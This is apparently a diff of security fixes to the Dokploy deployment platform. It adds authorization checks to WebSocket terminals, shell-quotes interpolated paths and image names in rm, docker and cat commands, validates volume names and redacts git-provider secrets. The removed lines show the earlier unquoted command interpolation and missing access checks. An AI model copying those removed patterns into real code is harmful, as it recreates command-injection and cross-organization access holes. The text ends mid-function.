import { WebSocketServer } from "ws";
|
import { WebSocketServer } from "ws";
|
||||||
|
import { canAccessDockerOverWss } from "./authorize";
|
||||||
|
|
||||||
export const setupDockerStatsMonitoringSocketServer = (
|
export const setupDockerStatsMonitoringSocketServer = (
|
||||||
server: http.Server<typeof http.IncomingMessage, typeof http.ServerResponse>,
|
server: http.Server<typeof http.IncomingMessage, typeof http.ServerResponse>,
|
||||||
@@ -44,6 +45,7 @@ export const setupDockerStatsMonitoringSocketServer = (
|
|||||||
| "application"
|
| "application"
|
||||||
| "stack"
|
| "stack"
|
||||||
| "docker-compose";
|
| "docker-compose";
|
||||||
|
const serviceId = url.searchParams.get("serviceId");
|
||||||
const { user, session } = await validateRequest(req);
|
const { user, session } = await validateRequest(req);
|
||||||
|
|
||||||
if (!appName) {
|
if (!appName) {
|
||||||
@@ -55,6 +57,11 @@ export const setupDockerStatsMonitoringSocketServer = (
|
|||||||
ws.close();
|
ws.close();
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (!(await canAccessDockerOverWss(user, session, null, serviceId))) {
|
||||||
|
ws.close(4003, "Not authorized");
|
||||||
|
return;
|
||||||
|
}
|
||||||
const intervalId = setInterval(async () => {
|
const intervalId = setInterval(async () => {
|
||||||
try {
|
try {
|
||||||
// Special case: when monitoring "dokploy", get host system stats instead of container stats
|
// Special case: when monitoring "dokploy", get host system stats instead of container stats
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import { publicIpv4, publicIpv6 } from "public-ip";
|
|||||||
import { Client, type ConnectConfig } from "ssh2";
|
import { Client, type ConnectConfig } from "ssh2";
|
||||||
import { WebSocketServer } from "ws";
|
import { WebSocketServer } from "ws";
|
||||||
import { getDockerHost } from "../utils/docker";
|
import { getDockerHost } from "../utils/docker";
|
||||||
|
import { canAccessTerminalOverWss } from "./authorize";
|
||||||
import { setupLocalServerSSHKey } from "./utils";
|
import { setupLocalServerSSHKey } from "./utils";
|
||||||
|
|
||||||
const COMMAND_TO_ALLOW_LOCAL_ACCESS = `
|
const COMMAND_TO_ALLOW_LOCAL_ACCESS = `
|
||||||
@@ -93,6 +94,11 @@ export const setupTerminalWebSocketServer = (
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if (!(await canAccessTerminalOverWss(user, session, serverId))) {
|
||||||
|
ws.close(4003, "Not authorized");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
let connectionDetails: ConnectConfig = {};
|
let connectionDetails: ConnectConfig = {};
|
||||||
|
|
||||||
const isLocalServer = serverId === "local";
|
const isLocalServer = serverId === "local";
|
||||||
|
|||||||
@@ -54,6 +54,15 @@ export const apiUpdateAi = createSchema
|
|||||||
})
|
})
|
||||||
.omit({ organizationId: true });
|
.omit({ organizationId: true });
|
||||||
|
|
||||||
|
export const aiCustomProviderSchema = z.object({
|
||||||
|
name: z.string().min(1, { message: "Name is required" }),
|
||||||
|
apiUrl: z.string().url({ message: "Please enter a valid URL" }),
|
||||||
|
});
|
||||||
|
|
||||||
|
export const apiSaveAiCustomProviders = z.object({
|
||||||
|
providers: z.array(aiCustomProviderSchema),
|
||||||
|
});
|
||||||
|
|
||||||
export const deploySuggestionSchema = z.object({
|
export const deploySuggestionSchema = z.object({
|
||||||
environmentId: z.string().min(1),
|
environmentId: z.string().min(1),
|
||||||
id: z.string().min(1),
|
id: z.string().min(1),
|
||||||
|
|||||||
@@ -57,6 +57,7 @@ export const schedules = pgTable("schedule", {
|
|||||||
});
|
});
|
||||||
|
|
||||||
export type Schedule = typeof schedules.$inferSelect;
|
export type Schedule = typeof schedules.$inferSelect;
|
||||||
|
export type ScheduleType = Schedule["scheduleType"];
|
||||||
|
|
||||||
export const schedulesRelations = relations(schedules, ({ one, many }) => ({
|
export const schedulesRelations = relations(schedules, ({ one, many }) => ({
|
||||||
application: one(applications, {
|
application: one(applications, {
|
||||||
@@ -78,7 +79,9 @@ export const schedulesRelations = relations(schedules, ({ one, many }) => ({
|
|||||||
deployments: many(deployments),
|
deployments: many(deployments),
|
||||||
}));
|
}));
|
||||||
|
|
||||||
export const createScheduleSchema = createInsertSchema(schedules);
|
export const createScheduleSchema = createInsertSchema(schedules, {
|
||||||
|
scheduleType: z.enum(["application", "compose", "server", "dokploy-server"]),
|
||||||
|
});
|
||||||
|
|
||||||
export const updateScheduleSchema = createScheduleSchema.extend({
|
export const updateScheduleSchema = createScheduleSchema.extend({
|
||||||
scheduleId: z.string().min(1),
|
scheduleId: z.string().min(1),
|
||||||
|
|||||||
@@ -41,6 +41,12 @@ export const APP_NAME_REGEX = /^[a-zA-Z0-9._-]+$/;
|
|||||||
export const APP_NAME_MESSAGE =
|
export const APP_NAME_MESSAGE =
|
||||||
"App name can only contain letters, numbers, dots, underscores and hyphens";
|
"App name can only contain letters, numbers, dots, underscores and hyphens";
|
||||||
|
|
||||||
|
/** Docker volume name: must start alphanumeric, then letters/numbers/._- only. Safe for shell. */
|
||||||
|
export const VOLUME_NAME_REGEX = /^[a-zA-Z0-9][a-zA-Z0-9_.-]*$/;
|
||||||
|
|
||||||
|
export const VOLUME_NAME_MESSAGE =
|
||||||
|
"Volume name must start with a letter or number and contain only letters, numbers, dots, underscores and hyphens";
|
||||||
|
|
||||||
/** Database password: blocks shell-dangerous characters like $ ! ' " \ / and spaces. */
|
/** Database password: blocks shell-dangerous characters like $ ! ' " \ / and spaces. */
|
||||||
export const DATABASE_PASSWORD_REGEX =
|
export const DATABASE_PASSWORD_REGEX =
|
||||||
/^[a-zA-Z0-9@#%^&*()_+\-=[\]{}|;:,.<>?~`]*$/;
|
/^[a-zA-Z0-9@#%^&*()_+\-=[\]{}|;:,.<>?~`]*$/;
|
||||||
|
|||||||
@@ -14,7 +14,11 @@ import { serviceType } from "./mount";
|
|||||||
import { mysql } from "./mysql";
|
import { mysql } from "./mysql";
|
||||||
import { postgres } from "./postgres";
|
import { postgres } from "./postgres";
|
||||||
import { redis } from "./redis";
|
import { redis } from "./redis";
|
||||||
import { generateAppName } from "./utils";
|
import {
|
||||||
|
generateAppName,
|
||||||
|
VOLUME_NAME_MESSAGE,
|
||||||
|
VOLUME_NAME_REGEX,
|
||||||
|
} from "./utils";
|
||||||
|
|
||||||
export const volumeBackups = pgTable("volume_backup", {
|
export const volumeBackups = pgTable("volume_backup", {
|
||||||
volumeBackupId: text("volumeBackupId")
|
volumeBackupId: text("volumeBackupId")
|
||||||
@@ -113,7 +117,9 @@ export const volumeBackupsRelations = relations(
|
|||||||
}),
|
}),
|
||||||
);
|
);
|
||||||
|
|
||||||
export const createVolumeBackupSchema = createInsertSchema(volumeBackups).omit({
|
export const createVolumeBackupSchema = createInsertSchema(volumeBackups, {
|
||||||
|
volumeName: z.string().regex(VOLUME_NAME_REGEX, VOLUME_NAME_MESSAGE),
|
||||||
|
}).omit({
|
||||||
volumeBackupId: true,
|
volumeBackupId: true,
|
||||||
});
|
});
|
||||||
|
|
||||||
|
|||||||
@@ -419,7 +419,7 @@ const createBetterAuth = () =>
|
|||||||
enableMetadata: true,
|
enableMetadata: true,
|
||||||
references: "user",
|
references: "user",
|
||||||
}),
|
}),
|
||||||
sso(),
|
sso({ trustEmailVerified: true }),
|
||||||
scim({
|
scim({
|
||||||
beforeSCIMTokenGenerated: async ({ user }) => {
|
beforeSCIMTokenGenerated: async ({ user }) => {
|
||||||
const dbUser = await db.query.user.findFirst({
|
const dbUser = await db.query.user.findFirst({
|
||||||
|
|||||||
@@ -1,5 +1,6 @@
|
|||||||
import { db } from "@dokploy/server/db";
|
import { db } from "@dokploy/server/db";
|
||||||
import { ai } from "@dokploy/server/db/schema";
|
import { ai, organization } from "@dokploy/server/db/schema";
|
||||||
|
import { aiCustomProviderSchema } from "@dokploy/server/db/schema/ai";
|
||||||
import { selectAIProvider } from "@dokploy/server/utils/ai/select-ai-provider";
|
import { selectAIProvider } from "@dokploy/server/utils/ai/select-ai-provider";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { generateText, Output } from "ai";
|
import { generateText, Output } from "ai";
|
||||||
@@ -48,9 +49,74 @@ export const getAiSettingById = async (aiId: string) => {
|
|||||||
return aiSetting;
|
return aiSetting;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
type AiCustomProvider = z.infer<typeof aiCustomProviderSchema>;
|
||||||
|
|
||||||
|
const parseOrgMetadata = (metadata: string | null) => {
|
||||||
|
try {
|
||||||
|
const parsed = JSON.parse(metadata || "{}");
|
||||||
|
return typeof parsed === "object" && parsed !== null
|
||||||
|
? (parsed as Record<string, unknown>)
|
||||||
|
: {};
|
||||||
|
} catch {
|
||||||
|
return {};
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
export const getCustomAiProviders = async (organizationId: string) => {
|
||||||
|
const org = await db.query.organization.findFirst({
|
||||||
|
where: eq(organization.id, organizationId),
|
||||||
|
});
|
||||||
|
const metadata = parseOrgMetadata(org?.metadata ?? null);
|
||||||
|
const result = z
|
||||||
|
.array(aiCustomProviderSchema)
|
||||||
|
.safeParse(metadata.aiProviders);
|
||||||
|
return result.success ? result.data : [];
|
||||||
|
};
|
||||||
|
|
||||||
|
export const saveCustomAiProviders = async (
|
||||||
|
organizationId: string,
|
||||||
|
providers: AiCustomProvider[],
|
||||||
|
) => {
|
||||||
|
const org = await db.query.organization.findFirst({
|
||||||
|
where: eq(organization.id, organizationId),
|
||||||
|
});
|
||||||
|
if (!org) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "NOT_FOUND",
|
||||||
|
message: "Organization not found",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
const metadata = parseOrgMetadata(org.metadata);
|
||||||
|
metadata.aiProviders = providers;
|
||||||
|
await db
|
||||||
|
.update(organization)
|
||||||
|
.set({ metadata: JSON.stringify(metadata) })
|
||||||
|
.where(eq(organization.id, organizationId));
|
||||||
|
return providers;
|
||||||
|
};
|
||||||
|
|
||||||
|
const normalizeApiUrl = (url: string) => url.trim().replace(/\/+$/, "");
|
||||||
|
|
||||||
export const saveAiSettings = async (organizationId: string, settings: any) => {
|
export const saveAiSettings = async (organizationId: string, settings: any) => {
|
||||||
const aiId = settings.aiId;
|
const aiId = settings.aiId;
|
||||||
|
|
||||||
|
if (settings.apiUrl) {
|
||||||
|
const customProviders = await getCustomAiProviders(organizationId);
|
||||||
|
if (customProviders.length > 0) {
|
||||||
|
const isAllowed = customProviders.some(
|
||||||
|
(provider) =>
|
||||||
|
normalizeApiUrl(provider.apiUrl) === normalizeApiUrl(settings.apiUrl),
|
||||||
|
);
|
||||||
|
if (!isAllowed) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "FORBIDDEN",
|
||||||
|
message:
|
||||||
|
"This API URL is not in your organization's allowed AI providers",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
return db
|
return db
|
||||||
.insert(ai)
|
.insert(ai)
|
||||||
.values({
|
.values({
|
||||||
|
|||||||
@@ -102,10 +102,24 @@ export const findApplicationById = async (applicationId: string) => {
|
|||||||
redirects: true,
|
redirects: true,
|
||||||
security: true,
|
security: true,
|
||||||
ports: true,
|
ports: true,
|
||||||
gitlab: true,
|
gitlab: {
|
||||||
github: true,
|
columns: { secret: false, accessToken: false, refreshToken: false },
|
||||||
bitbucket: true,
|
},
|
||||||
gitea: true,
|
github: {
|
||||||
|
columns: {
|
||||||
|
githubClientSecret: false,
|
||||||
|
githubPrivateKey: false,
|
||||||
|
githubWebhookSecret: false,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
bitbucket: { columns: { appPassword: false, apiToken: false } },
|
||||||
|
gitea: {
|
||||||
|
columns: {
|
||||||
|
clientSecret: false,
|
||||||
|
accessToken: false,
|
||||||
|
refreshToken: false,
|
||||||
|
},
|
||||||
|
},
|
||||||
server: true,
|
server: true,
|
||||||
previewDeployments: true,
|
previewDeployments: true,
|
||||||
registry: { columns: { password: false } },
|
registry: { columns: { password: false } },
|
||||||
|
|||||||
@@ -9,6 +9,7 @@ import {
|
|||||||
import { removeDirectoryIfExistsContent } from "@dokploy/server/utils/filesystem/directory";
|
import { removeDirectoryIfExistsContent } from "@dokploy/server/utils/filesystem/directory";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { stringify } from "yaml";
|
import { stringify } from "yaml";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { encodeBase64 } from "../utils/docker/utils";
|
import { encodeBase64 } from "../utils/docker/utils";
|
||||||
@@ -63,7 +64,7 @@ export const removeCertificateById = async (certificateId: string) => {
|
|||||||
const certDir = path.join(CERTIFICATES_PATH, certificate.certificatePath);
|
const certDir = path.join(CERTIFICATES_PATH, certificate.certificatePath);
|
||||||
|
|
||||||
if (certificate.serverId) {
|
if (certificate.serverId) {
|
||||||
await execAsyncRemote(certificate.serverId, `rm -rf ${certDir}`);
|
await execAsyncRemote(certificate.serverId, `rm -rf ${quote([certDir])}`);
|
||||||
} else {
|
} else {
|
||||||
await removeDirectoryIfExistsContent(certDir);
|
await removeDirectoryIfExistsContent(certDir);
|
||||||
}
|
}
|
||||||
@@ -108,10 +109,10 @@ const createCertificateFiles = async (certificate: Certificate) => {
|
|||||||
const certificateData = encodeBase64(certificate.certificateData);
|
const certificateData = encodeBase64(certificate.certificateData);
|
||||||
const privateKey = encodeBase64(certificate.privateKey);
|
const privateKey = encodeBase64(certificate.privateKey);
|
||||||
const command = `
|
const command = `
|
||||||
mkdir -p ${certDir};
|
mkdir -p ${quote([certDir])};
|
||||||
echo "${certificateData}" | base64 -d > "${crtPath}";
|
echo "${certificateData}" | base64 -d > ${quote([crtPath])};
|
||||||
echo "${privateKey}" | base64 -d > "${keyPath}";
|
echo "${privateKey}" | base64 -d > ${quote([keyPath])};
|
||||||
echo "${yamlConfig}" > "${configFile}";
|
echo "${yamlConfig}" > ${quote([configFile])};
|
||||||
`;
|
`;
|
||||||
|
|
||||||
await execAsyncRemote(certificate.serverId, command);
|
await execAsyncRemote(certificate.serverId, command);
|
||||||
|
|||||||
@@ -33,6 +33,7 @@ import { cloneGitlabRepository } from "@dokploy/server/utils/providers/gitlab";
|
|||||||
import { getCreateComposeFileCommand } from "@dokploy/server/utils/providers/raw";
|
import { getCreateComposeFileCommand } from "@dokploy/server/utils/providers/raw";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { encodeBase64 } from "../utils/docker/utils";
|
import { encodeBase64 } from "../utils/docker/utils";
|
||||||
import { getDokployUrl } from "./admin";
|
import { getDokployUrl } from "./admin";
|
||||||
@@ -472,7 +473,7 @@ export const startCompose = async (composeId: string) => {
|
|||||||
const projectPath = join(COMPOSE_PATH, compose.appName, "code");
|
const projectPath = join(COMPOSE_PATH, compose.appName, "code");
|
||||||
const path =
|
const path =
|
||||||
compose.sourceType === "raw" ? "docker-compose.yml" : compose.composePath;
|
compose.sourceType === "raw" ? "docker-compose.yml" : compose.composePath;
|
||||||
const baseCommand = `env -i PATH="$PATH" docker compose -p ${compose.appName} -f ${path} up -d`;
|
const baseCommand = `env -i PATH="$PATH" docker compose -p ${quote([compose.appName])} -f ${quote([path])} up -d`;
|
||||||
if (compose.composeType === "docker-compose") {
|
if (compose.composeType === "docker-compose") {
|
||||||
if (compose.serverId) {
|
if (compose.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
|
|||||||
@@ -2,6 +2,7 @@ import {
|
|||||||
execAsync,
|
execAsync,
|
||||||
execAsyncRemote,
|
execAsyncRemote,
|
||||||
} from "@dokploy/server/utils/process/execAsync";
|
} from "@dokploy/server/utils/process/execAsync";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
|
|
||||||
export const getContainers = async (serverId?: string | null) => {
|
export const getContainers = async (serverId?: string | null) => {
|
||||||
try {
|
try {
|
||||||
@@ -519,7 +520,7 @@ export const getSwarmNodes = async (serverId?: string) => {
|
|||||||
|
|
||||||
export const getNodeInfo = async (nodeId: string, serverId?: string) => {
|
export const getNodeInfo = async (nodeId: string, serverId?: string) => {
|
||||||
try {
|
try {
|
||||||
const command = `docker node inspect ${nodeId} --format '{{json .}}'`;
|
const command = `docker node inspect ${quote([nodeId])} --format '{{json .}}'`;
|
||||||
let stdout = "";
|
let stdout = "";
|
||||||
let stderr = "";
|
let stderr = "";
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
|
|||||||
@@ -119,3 +119,30 @@ export const getAccessibleGitProviderIds = async (session: {
|
|||||||
}
|
}
|
||||||
return result;
|
return result;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Authorizes read access to a specific git provider for the current session.
|
||||||
|
* Throws if the provider belongs to a different organization (cross-org IDOR)
|
||||||
|
* or if the caller is not entitled to it within the active organization.
|
||||||
|
* Must be called before returning any git-provider record that carries secrets
|
||||||
|
* (OAuth tokens, app private keys, webhook secrets).
|
||||||
|
*/
|
||||||
|
export const assertGitProviderAccess = async (
|
||||||
|
session: { userId: string; activeOrganizationId: string },
|
||||||
|
provider: { gitProviderId: string; organizationId: string },
|
||||||
|
) => {
|
||||||
|
if (provider.organizationId !== session.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "NOT_FOUND",
|
||||||
|
message: "Git provider not found",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
const accessibleIds = await getAccessibleGitProviderIds(session);
|
||||||
|
if (!accessibleIds.has(provider.gitProviderId)) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "FORBIDDEN",
|
||||||
|
message: "You don't have access to this git provider",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, getTableColumns } from "drizzle-orm";
|
import { eq, getTableColumns } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -140,7 +141,7 @@ export const deployLibsql = async (
|
|||||||
if (libsql.serverId) {
|
if (libsql.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
libsql.serverId,
|
libsql.serverId,
|
||||||
`docker pull ${libsql.dockerImage}`,
|
`docker pull ${quote([libsql.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, getTableColumns } from "drizzle-orm";
|
import { eq, getTableColumns } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -145,7 +146,7 @@ export const deployMariadb = async (
|
|||||||
if (mariadb.serverId) {
|
if (mariadb.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
mariadb.serverId,
|
mariadb.serverId,
|
||||||
`docker pull ${mariadb.dockerImage}`,
|
`docker pull ${quote([mariadb.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -12,6 +12,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, getTableColumns } from "drizzle-orm";
|
import { eq, getTableColumns } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -160,7 +161,7 @@ export const deployMongo = async (
|
|||||||
if (mongo.serverId) {
|
if (mongo.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
mongo.serverId,
|
mongo.serverId,
|
||||||
`docker pull ${mongo.dockerImage}`,
|
`docker pull ${quote([mongo.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -18,6 +18,7 @@ import {
|
|||||||
} from "@dokploy/server/utils/process/execAsync";
|
} from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, type SQL, sql } from "drizzle-orm";
|
import { eq, type SQL, sql } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
|
|
||||||
export type Mount = typeof mounts.$inferSelect;
|
export type Mount = typeof mounts.$inferSelect;
|
||||||
@@ -317,7 +318,7 @@ export const updateFileMount = async (mountId: string) => {
|
|||||||
try {
|
try {
|
||||||
const serverId = await getServerId(mount);
|
const serverId = await getServerId(mount);
|
||||||
const encodedContent = encodeBase64(mount.content || "");
|
const encodedContent = encodeBase64(mount.content || "");
|
||||||
const command = `echo "${encodedContent}" | base64 -d > ${fullPath}`;
|
const command = `echo "${encodedContent}" | base64 -d > ${quote([fullPath])}`;
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
await execAsyncRemote(serverId, command);
|
await execAsyncRemote(serverId, command);
|
||||||
} else {
|
} else {
|
||||||
@@ -337,7 +338,7 @@ export const deleteFileMount = async (mountId: string) => {
|
|||||||
try {
|
try {
|
||||||
const serverId = await getServerId(mount);
|
const serverId = await getServerId(mount);
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
const command = `rm -rf ${fullPath}`;
|
const command = `rm -rf ${quote([fullPath])}`;
|
||||||
await execAsyncRemote(serverId, command);
|
await execAsyncRemote(serverId, command);
|
||||||
} else {
|
} else {
|
||||||
await removeFileOrDirectory(fullPath);
|
await removeFileOrDirectory(fullPath);
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, getTableColumns } from "drizzle-orm";
|
import { eq, getTableColumns } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -143,7 +144,7 @@ export const deployMySql = async (
|
|||||||
if (mysql.serverId) {
|
if (mysql.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
mysql.serverId,
|
mysql.serverId,
|
||||||
`docker pull ${mysql.dockerImage}`,
|
`docker pull ${quote([mysql.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import { join } from "node:path";
|
import { join } from "node:path";
|
||||||
import { paths } from "@dokploy/server/constants";
|
import { paths } from "@dokploy/server/constants";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
|
import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
|
||||||
import { cloneBitbucketRepository } from "../utils/providers/bitbucket";
|
import { cloneBitbucketRepository } from "../utils/providers/bitbucket";
|
||||||
import { cloneGitRepository } from "../utils/providers/git";
|
import { cloneGitRepository } from "../utils/providers/git";
|
||||||
@@ -85,7 +86,7 @@ export const readPatchRepoDirectory = async (
|
|||||||
serverId?: string | null,
|
serverId?: string | null,
|
||||||
): Promise<DirectoryEntry[]> => {
|
): Promise<DirectoryEntry[]> => {
|
||||||
// Use git ls-tree to get tracked files only
|
// Use git ls-tree to get tracked files only
|
||||||
const command = `cd "${repoPath}" && git ls-tree -r --name-only HEAD`;
|
const command = `cd ${quote([repoPath])} && git ls-tree -r --name-only HEAD`;
|
||||||
|
|
||||||
let stdout: string;
|
let stdout: string;
|
||||||
try {
|
try {
|
||||||
@@ -168,7 +169,7 @@ export const readPatchRepoFile = async (
|
|||||||
const repoPath = join(PATCH_REPOS_PATH, type, application.appName);
|
const repoPath = join(PATCH_REPOS_PATH, type, application.appName);
|
||||||
const fullPath = join(repoPath, filePath);
|
const fullPath = join(repoPath, filePath);
|
||||||
|
|
||||||
const command = `cat "${fullPath}"`;
|
const command = `cat ${quote([fullPath])}`;
|
||||||
|
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
const result = await execAsyncRemote(serverId, command);
|
const result = await execAsyncRemote(serverId, command);
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq, getTableColumns } from "drizzle-orm";
|
import { eq, getTableColumns } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -155,7 +156,7 @@ export const deployPostgres = async (
|
|||||||
if (postgres.serverId) {
|
if (postgres.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
postgres.serverId,
|
postgres.serverId,
|
||||||
`docker pull ${postgres.dockerImage}`,
|
`docker pull ${quote([postgres.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -10,6 +10,7 @@ import { pullImage } from "@dokploy/server/utils/docker/utils";
|
|||||||
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
import { execAsyncRemote } from "@dokploy/server/utils/process/execAsync";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { validUniqueServerAppName } from "./project";
|
import { validUniqueServerAppName } from "./project";
|
||||||
|
|
||||||
@@ -110,7 +111,7 @@ export const deployRedis = async (
|
|||||||
if (redis.serverId) {
|
if (redis.serverId) {
|
||||||
await execAsyncRemote(
|
await execAsyncRemote(
|
||||||
redis.serverId,
|
redis.serverId,
|
||||||
`docker pull ${redis.dockerImage}`,
|
`docker pull ${quote([redis.dockerImage])}`,
|
||||||
onData,
|
onData,
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import path from "node:path";
|
|||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { paths } from "../constants";
|
import { IS_CLOUD, paths } from "../constants";
|
||||||
import { db } from "../db";
|
import { db } from "../db";
|
||||||
import type {
|
import type {
|
||||||
createScheduleSchema,
|
createScheduleSchema,
|
||||||
@@ -11,9 +11,51 @@ import type {
|
|||||||
import { type Schedule, schedules } from "../db/schema/schedule";
|
import { type Schedule, schedules } from "../db/schema/schedule";
|
||||||
import { encodeBase64 } from "../utils/docker/utils";
|
import { encodeBase64 } from "../utils/docker/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
|
import { execAsync, execAsyncRemote } from "../utils/process/execAsync";
|
||||||
|
import { findMemberByUserId } from "./permission";
|
||||||
|
import { findServerById } from "./server";
|
||||||
|
|
||||||
export type ScheduleExtended = Awaited<ReturnType<typeof findScheduleById>>;
|
export type ScheduleExtended = Awaited<ReturnType<typeof findScheduleById>>;
|
||||||
|
|
||||||
|
// Host-level schedules (server / dokploy-server) run their script as root on the
|
||||||
|
// host and must stay restricted to owners/admins, regardless of whether the
|
||||||
|
// request is also tied to a service. Attaching an accessible applicationId must
|
||||||
|
// not downgrade this to a service-access check.
|
||||||
|
export const assertHostScheduleAccess = async (
|
||||||
|
